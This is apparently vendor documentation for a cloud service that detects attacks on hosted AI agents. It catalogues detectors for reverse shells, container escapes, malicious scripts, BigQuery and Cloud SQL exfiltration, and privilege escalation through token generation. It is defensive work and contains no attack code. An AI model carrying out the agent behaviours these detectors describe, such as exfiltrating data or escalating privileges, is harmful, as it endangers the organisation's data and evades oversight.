Agent Engine Threat Detection overview

Premium and Enterpriseservice tiers

Preview

This feature is subject to the "Pre-GA Offerings Terms" in the General Service Terms section of theService Specific Terms. Pre-GA features are available "as is" and might have limited support. For more information, see thelaunch stage descriptions.

This document describes Agent Engine Threat Detection and its detectors.

Agent Engine Threat Detection is a built-in service of Security Command Center that helps you detect andinvestigate potential attacks on AI agents that are deployed toVertex AI Agent EngineRuntime. If the Agent Engine Threat Detection service detects a potential attack, the servicegenerates a finding in Security Command Center in near-real time.

Agent Engine Threat Detection monitors thesupported AIagentsand detects the most common runtime threats. Runtime threats include theexecution of malicious binaries or scripts, container escapes, reverse shells,and the use of attack tools within the agent's environment.

In addition, control-plane detectors fromEvent Threat Detectionanalyze various audit logs (includingIdentity and Access Management, BigQuery, and Cloud SQL logs) andVertex AI Agent Engine logs (stdout andstderr) todetect suspicious activities. Control-plane threats include dataexfiltration attempts, excessive permission denials, andsuspicious token generation.

Benefits

Agent Engine Threat Detection offers the following benefits:

  • Proactively reduce risk for AI workloads. Agent Engine Threat Detection helps youdetect and respond to threats early by monitoring the behavior and environmentof your AI agents
  • Manage AI security in a unified location. Agent Engine Threat Detection findingsappear directly in Security Command Center. You have a central interface to viewand manage threat findings alongside other cloud security risks.

How it works

Agent Engine Threat Detection collects telemetry from the hosted AIagents to analyze processes, scripts, and libraries that might indicate aruntime attack. When Agent Engine Threat Detection detects a potential threat, it does thefollowing:

  1. Agent Engine Threat Detection uses a watcher process to collect event informationwhile the agentic workload is running. The watcher process can takeup to one minute to start and collect information.

  2. Agent Engine Threat Detection analyzes the collected event information to determinewhether an event indicates an incident. Agent Engine Threat Detection uses naturallanguage processing (NLP) to analyze Bash and Python scripts for maliciouscode.

    • If Agent Engine Threat Detection identifies an incident, it reports the incident asa finding in Security Command Center.

    • If Agent Engine Threat Detection doesn't identify an incident, it doesn't store anyinformation.

    • All data collected is processed in memory and doesn't persist afteranalysis unless identified as an incident and reported as a finding.

For information about how to review Agent Engine Threat Detection findings in theGoogle Cloud console, seeReviewfindings.

Detectors

This section lists the runtime and control-plane detectors that monitor AIagents that are deployed to Vertex AI Agent Engine Runtime.

Runtime detectors

Agent Engine Threat Detection includes the following runtime detectors:

Display nameModule nameDescription
Execution: Added Malicious Binary Executed (Preview)AGENT_ENGINE_ADDED_MALICIOUS_BINARY_EXECUTED

A process executed a binary that threat intelligence identifies as malicious. This binary was not part of the original agentic workload.

This event strongly suggests that an attacker has control of the workload and is running malicious software.

Execution: Added Malicious Library Loaded (Preview)AGENT_ENGINE_ADDED_MALICIOUS_LIBRARY_LOADED

A process loaded a library that threat intelligence identifies as malicious. This library was not part of the original agentic workload.

This event suggests that an attacker likely has control of the workload and is running malicious software.

Execution: Built in Malicious Binary Executed (Preview)AGENT_ENGINE_BUILT_IN_MALICIOUS_BINARY_EXECUTED

A process executed a binary that threat intelligence identifies as malicious. This binary was part of the original agentic workload.

This event might suggest that an attacker is deploying a malicious workload. For example, the actor might have gained control of a legitimate build pipeline and injected the malicious binary into the agentic workload.

Execution: Container Escape (Preview)AGENT_ENGINE_CONTAINER_ESCAPE

A process running inside the container attempted to bypass container isolation by using known exploit techniques or binaries, which threat intelligence identifies as potential threats. A successful escape can allow an attacker to access the host system and potentially compromise the entire environment.

This action suggests that an attacker is exploiting vulnerabilities to gain unauthorized access to the host system or broader infrastructure.

Execution: Kubernetes Attack Tool Execution (Preview)AGENT_ENGINE_KUBERNETES_ATTACK_TOOL_EXECUTION

A process executed a Kubernetes-specific attack tool, which threat intelligence identifies as a potential threat.

This action suggests that an attacker has gained access to the cluster and is using the tool to exploit Kubernetes-specific vulnerabilities or configurations.

Execution: Local Reconnaissance Tool Execution (Preview)AGENT_ENGINE_LOCAL_RECONNAISSANCE_TOOL_EXECUTION

A process executed a local reconnaissance tool that is not typically part of the agentic workload. Threat intelligence identifies these tools as potential threats.

This event suggests that an attacker is trying to gather internal system information, such as mapping the infrastructure, identifying vulnerabilities, or collecting data on system configurations.

Execution: Malicious Python Executed (Preview)AGENT_ENGINE_MALICIOUS_PYTHON_EXECUTED

A machine learning model identified executed Python code as malicious. An attacker can use Python to download tools or files into a compromised environment and execute commands without using binaries.

The detector uses natural language processing (NLP) to analyze the Python code's content. Because this approach isn't based on signatures, detectors can identify known and novel malicious Python code.

Execution: Modified Malicious Binary Executed (Preview)AGENT_ENGINE_MODIFIED_MALICIOUS_BINARY_EXECUTED

A process executed a binary that threat intelligence identifies as malicious. This binary was part of the original agentic workload but was modified at runtime.

This event suggests that an attacker might have control of the workload and is running malicious software.

Execution: Modified Malicious Library Loaded (Preview)AGENT_ENGINE_MODIFIED_MALICIOUS_LIBRARY_LOADED

A process loaded a library that threat intelligence identifies as malicious. This library was part of the original agentic workload but was modified at runtime.

This event suggests that an attacker has control of the workload and is running malicious software.

Malicious Script Executed (Preview)AGENT_ENGINE_MALICIOUS_SCRIPT_EXECUTED

A machine learning model identified executed Bash code as malicious. An attacker can use Bash to download tools or files into a compromised environment and execute commands without using binaries.

The detector uses NLP to analyze the Bash code's content. Because this approach is not based on signatures, detectors can identify known and novel malicious Bash code.

Malicious URL Observed (Preview)AGENT_ENGINE_MALICIOUS_URL_OBSERVED

Agent Engine Threat Detection observed a malicious URL in the argument list of a running process.

The detector compares these URLs against the unsafe web resources lists maintained by the GoogleSafe Browsing service. If you believe that Google incorrectly classified a URL as a phishing site or malware, report the issue at Reporting Incorrect Data.

Reverse Shell (Preview)AGENT_ENGINE_REVERSE_SHELL

A process started with stream redirection to a remote connected socket. The detector looks forstdin bound to a remote socket.

A reverse shell allows an attacker to communicate from a compromised workload to an attacker-controlled machine. The attacker can then command and control the workload—for example, as part of a botnet.

Unexpected Child Shell (Preview)AGENT_ENGINE_UNEXPECTED_CHILD_SHELL

A process that does not normally invoke shells unexpectedly spawned a shell process.

The detector monitors process executions and generates a finding when a known parent process spawns a shell unexpectedly.

Control-plane detectors

This section describes the control-plane detectors from Event Threat Detection thatare specifically designed for AI agents deployed toVertex AI Agent Engine Runtime. Event Threat Detection also hasdetectors for general AI-related threats.

These control-plane detectors are enabled by default.You manage these detectors the same way you do otherEvent Threat Detection detectors. For more information, seeUseEvent Threat Detection.

Display nameAPI nameLog source typesDescription
Discovery: Agent Engine Service Account Self-Investigation (Preview)AGENT_ENGINE_IAM_ANOMALOUS_BEHAVIOR_SERVICE_ACCOUNT_GETS_OWN_IAM_POLICYCloud Audit Logs:
IAM Data Access audit logs
Permissions:
DATA_READ

An identity associated with an AI agent deployed to Vertex AI Agent Engine was used to investigate the roles and permissions associated with that same service account.

Sensitive roles

Findings are classified asHigh orMedium severity, depending on the sensitivity of the roles granted. For more information, seeSensitive IAM roles and permissions.

Exfiltration: Agent Engine initiated BigQuery Data Exfiltration (Preview)AGENT_ENGINE_BIG_QUERY_EXFIL_VPC_PERIMETER_VIOLATION
AGENT_ENGINE_BIG_QUERY_EXFIL_TO_EXTERNAL_TABLE
Cloud Audit Logs: BigQueryAuditMetadata data access logsPermissions:
DATA_READ

Detects the following scenarios of a BigQuery data exfiltration initiated by an agent deployed to Vertex AI Agent Engine:

  • Resources owned by the protected organization were saved outside of the organization, including copy or transfer operations.

    This scenario corresponds to theAGENT_ENGINE_BIG_QUERY_EXFIL_TO_EXTERNAL_TABLE finding type and hasHigh severity.

  • Attempts were made to access BigQuery resources that are protected by VPC Service Controls.

    This scenario corresponds to theAGENT_ENGINE_BIG_QUERY_EXFIL_VPC_PERIMETER_VIOLATION finding type and hasLow severity.

Exfiltration: Agent Engine initiated CloudSQL exfiltration (Preview)AGENT_ENGINE_CLOUDSQL_EXFIL_EXPORT_TO_PUBLIC_GCS
AGENT_ENGINE_CLOUDSQL_EXFIL_EXPORT_TO_EXTERNAL_GCS
Cloud Audit Logs:MySQL data access logs
PostgreSQL data access logs
SQL Server data access logs

Detects the following scenarios of a Cloud SQL data exfiltration initiated by an agent deployed to Vertex AI Agent Engine:

  • Live instance data was exported to a Cloud Storage bucket outside of the organization.
  • Live instance data was exported to a Cloud Storage bucket that is owned by the organization and is publicly accessible.

For project-level activations of the Security Command Center Premium tier,this finding is available only if the Standard tier is enabled in theparent organization.. Findings are classified asHigh severity by default.

Exfiltration: Agent Engine initiated BigQuery Data Extraction (Preview)AGENT_ENGINE_BIG_QUERY_EXFIL_TO_CLOUD_STORAGECloud Audit Logs: BigQueryAuditMetadata data access logsPermissions:
DATA_READ

Detects the following scenarios of a BigQuery data extraction initiated by an agent deployed to Vertex AI Agent Engine:

  • A BigQuery resource owned by the protected organization was saved, through extraction operations, to a Cloud Storage bucket outside the organization.
  • A BigQuery resource owned by the protected organization was saved, through extraction operations, to a publicly accessible Cloud Storage bucket owned by that organization.

For project-level activations of the Security Command Center Premium tier,this finding is available only if the Standard tier is enabled in theparent organization.. Findings are classified asLow severity by default.

Initial Access: Agent Engine Identity Excessive Permission Denied Actions (Preview)AGENT_ENGINE_EXCESSIVE_FAILED_ATTEMPTCloud Audit Logs:Admin Activity logs An identity associated with an AI agent deployed to Vertex AI Agent Engine repeatedly triggeredpermission denied errors by attempting changes across multiple methods and services. Findings are classified asMedium severity by default.
Privilege Escalation: Agent Engine Suspicious Token Generation (Preview)AGENT_ENGINE_SUSPICIOUS_TOKEN_GENERATION_IMPLICIT_DELEGATIONCloud Audit Logs:
IAM Data Access audit logs
Theiam.serviceAccounts.implicitDelegation permission was misused to generate access tokens from a more privileged service account through a Vertex AI Agent Engine. Findings are classified asLow severity by default.
Privilege Escalation: Agent Engine Suspicious Token Generation (Preview)AGENT_ENGINE_SUSPICIOUS_TOKEN_GENERATION_CROSS_PROJECT_OPENIDCloud Audit Logs:
IAM Data Access audit logs

Theiam.serviceAccounts.getOpenIdToken IAM permission was used across projects through a Vertex AI Agent Engine.

This finding isn't available for project-level activations. Findings are classified asLow severity by default.

Privilege Escalation: Agent Engine Suspicious Token Generation (Preview)AGENT_ENGINE_SUSPICIOUS_TOKEN_GENERATION_CROSS_PROJECT_ACCESS_TOKENCloud Audit Logs:
IAM Data Access audit logs

Theiam.serviceAccounts.getAccessToken IAM permission was used across projects through an AI agent deployed to Vertex AI Agent Engine.

This finding isn't available for project-level activations. Findings are classified asLow severity by default.

For deprecated and shut down rules, seeDeprecations.

What's next

Except as otherwise noted, the content of this page is licensed under theCreative Commons Attribution 4.0 License, and code samples are licensed under theApache 2.0 License. For details, see theGoogle Developers Site Policies. Java is a registered trademark of Oracle and/or its affiliates.

Last updated 2025-12-17 UTC.